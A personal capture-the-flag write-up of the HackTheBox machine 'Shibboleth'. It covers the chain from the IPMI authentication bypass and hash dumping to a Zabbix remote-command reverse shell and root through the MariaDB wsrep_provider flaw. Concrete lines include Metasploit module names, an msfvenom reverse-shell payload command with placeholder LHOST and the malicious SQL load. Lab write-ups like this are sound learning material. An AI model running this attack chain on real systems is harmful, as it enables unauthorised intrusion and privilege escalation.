Jan 22
HackTheBox — Shibboleth Writeup
So this is my write-up on one of the HackTheBox machines called Shibboleth. Let’s go!
Initial
As usual first of we start with an NMAP scan.
Okay, only port 80 is open. The web server version is Apache 2.4.41 (not interesting at all). Is there another uncommon port that is open? Or do we have to do some port knocking? We will see. Let’s try to scan again.
Hmm.. a UDP scan perhaps?
I found interesting stuff on https://book.hacktricks.xyz/pentesting/623-udp-ipmi on that port. Maybe I will check on it later.
Let’s begin enumerating the web.
A beautiful-looking web page.
There’s a contact us form that finally is not a dummy and submits the data submitted to the contact.php file. So, now we know the website is based on php.
I tried to submit random stuff, and I got this error message
Error: Unable to load the “PHP Email Form” Library!
I wonder if it’s something.
Let’s do some directory brute-forcing and try to find subdomains.
So we got some directories and a file called changelog.txt. Nothing is interesting on /assets. On /forms, we got the contact.php we had interacted with earlier. Nothing is interesting on changelog.txt also.
Checking the subdomains we found a Zabbix login page.
Just to be sure, I will try to run gobuster on those three subdomains I found. In the meantime, let's google about Zabbix. Wikipedia said that
Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption.
Googling for exploits, I see these two potential exploits to bypass the authentication process.
But I’m sure it won’t work because it seems like we are using Zabbix version 5.0.
I got nothing on that Zabbix service. Let’s step back and check on that service on port 623. Summarizing from https://book.hacktricks.xyz/pentesting/623-udp-ipmi, port 623 is a default port for IPMI or Intelligent Platform Management Interface. It’s a Baseboard Management Controllers (BMCs), which are a type of embedded computer used to provide out-of-band monitoring for desktops and servers.
There’re vulnerabilities for these IPMI’s in which we can bypass authentication. First, we need to discover what version of ipmi the server is using. We can do it using Metasploit by using this:
use auxiliary/scanner/ipmi/ipmi_version
So it’s IPMI 2.0. It should be vulnerable.
Then, we can verify if it’s vulnerable or not by using this:
use auxiliary/scanner/ipmi/ipmi_cipher_zeroSet the options and run it. After running the Metasploit, it identifies that the service is indeed vulnerable.
The next step is to abuse it using ipmitool. (I’m just following the steps from hack book tricks btw).
The default credentials from the hack book tricks website don’t work on our case.
Reading the web again, it says that
Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password
So perhaps our IPMI is using different brands. It’s also noted on the hack book tricks website that first needs to find a valid user.
So any password will work and we just need to find the right user. Let’s find a user list for IPMI. After googling, I found this image from rapid7.
Let’s try the username one by one. Oh, the first one works!
Foothold
We know the right credentials to execute commands with the ipmitool. Now, we need to find the right command to leverage this vulnerability.
Reading more to book.hackbooktricks.xyz, it says that
Basically, you can ask the server for the hashes MD5 and SHA1 of any username and if the username exists those hashes will be sent back. Yeah, as amazing as it sounds. And there is a metasploit module for testing this (you can select the output in John or Hashcat format):
msf > use auxiliary/scanner/ipmi/ipmi_dumphashesSo yeah, we know that only a user called Administrator exists, so we can dump the hash for this user. Maybe we can use this user to login into the Zabbix service.
Just like that, we got the Administrator user password hash. Looking at https://hashcat.net/wiki/doku.php?id=example_hashes, I can see that the hash we got is similar to IPMI2 RAKP HMAC-SHA1 (ID 7300). It’s Cracking time.
Cracked! Let’s try to log in to the Zabbix dashboard.
We are in.
Now, how do we leverage this position? Can we execute commands with Zabbix? Since I can’t find any relevant CVE’s. Googling for a bit I found this post on StackOverflow https://stackoverflow.com/questions/24222086/how-to-run-command-on-zabbix-agents
It’s said that we could run commands from the server directly from a new item. So we have to create a new item.
First, set:
EnableRemoteCommands=1in the agent conf file (for all of your agents). To enable this feature.
I don’t know where this agent conf file is, so I will ignore it for now.
Now, how to create a new item. After wondering and looking at everything for a while, I can see that there’s an “Items” menu on Configuration > Hosts.
Clicking on it, we can see a “Create Item” button on the top right.
I just followed every step on that StackOverflow post and edit the command into a reverse shell command. We add that item.
After adding it, we can execute it!
Start a listener, execute it. and BOOM, we are inside.
But the shell dropped immediately. I tried again and stabilize the shell immediately.
Sadly, it’s still not working, so I have to think of another way.
I tried how to get a proper shell for a while with a bunch of payloads, but none works. It just wasn’t stable. It makes me look into the Zabbix documentation specifically on the system.run command. https://www.zabbix.com/documentation/current/en/manual/config/items/itemtypes/zabbix_agent.
It turns out we can specify a second parameter to the command, wait or nowait.
I tried to run it again, this time adding nowait in the second argument.
Finally, we got a stable shell. Stabilize the shell, and let’s get the user!
Getting Other User
So, there’s only one other user in this machine called ipmi-svc.
I immediately tried using the password we cracked earlier from the ipmi service. It turns out it works!
That was easy. Grab the user flag, and let’s get the root!
Getting Root
I tried to run sudo -l but it seems like we can’t run sudo.
Let’s first just try to find all things we have access to.
find / -group ipmi-svc 2>/dev/null | tee results.txt
Okay, seems like we have access to lots of things, but the one interests me the most is the zabbix_server.conf one, so let’s check on that.
Reading through those Zabbix server configuration files, I found uncommented database credentials.
Let’s keep that credentials and keep on reading.
I found nothing more interesting other than that DB credentials. Let’s try to access the DB. We have MySQL, perhaps we can try with that.
Wow, we are actually in.
Let’s enumerate it.
More hashes and I know we most likely can’t crack this one since it’s bcrypt with ten iterations.
Hm… what can we do with these database credentials. Is it a rabbit hole?
.
.
I found nothing. There must be something to do with these database credentials. I tried to get into the database again. I realize that the version of the MariaDB is quite outdated.
Googling for a bit and I found this from rapid7.
Surely, it’s suitable for our case. Searching for that CVE number, I immediately found this GitHub page https://github.com/Al1ex/CVE-2021-27928.
I followed the steps there.
First, generate a reverse shell executable.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o exploit.so
Secondly, start a listener.
Thirdly, transfer the exploit we generated.
Finally, execute the exploit.
mysql -u <user> -p -h <ip>
SET GLOBAL wsrep_provider="[path_to_exploit]";
ROOTED!
Final Thoughts
I like this machine. Exploiting the IPMI service was new to me. But it wasn’t hard with all of the resources available such as https://book.hacktricks.xyz/.
Gaining the foothold was kind of frustrating. I spend much time trying to make the shell stable.
This box reminds me to “always ENUMERATE EVERYTHING.” Take a look at the version of EVERYTHING. Even try the UDP scan when you find nothing on the SYN scan. Every little information is important.
Overall, a very good box indeed.
Thank you for reading this write-up! Stay safe everyone!
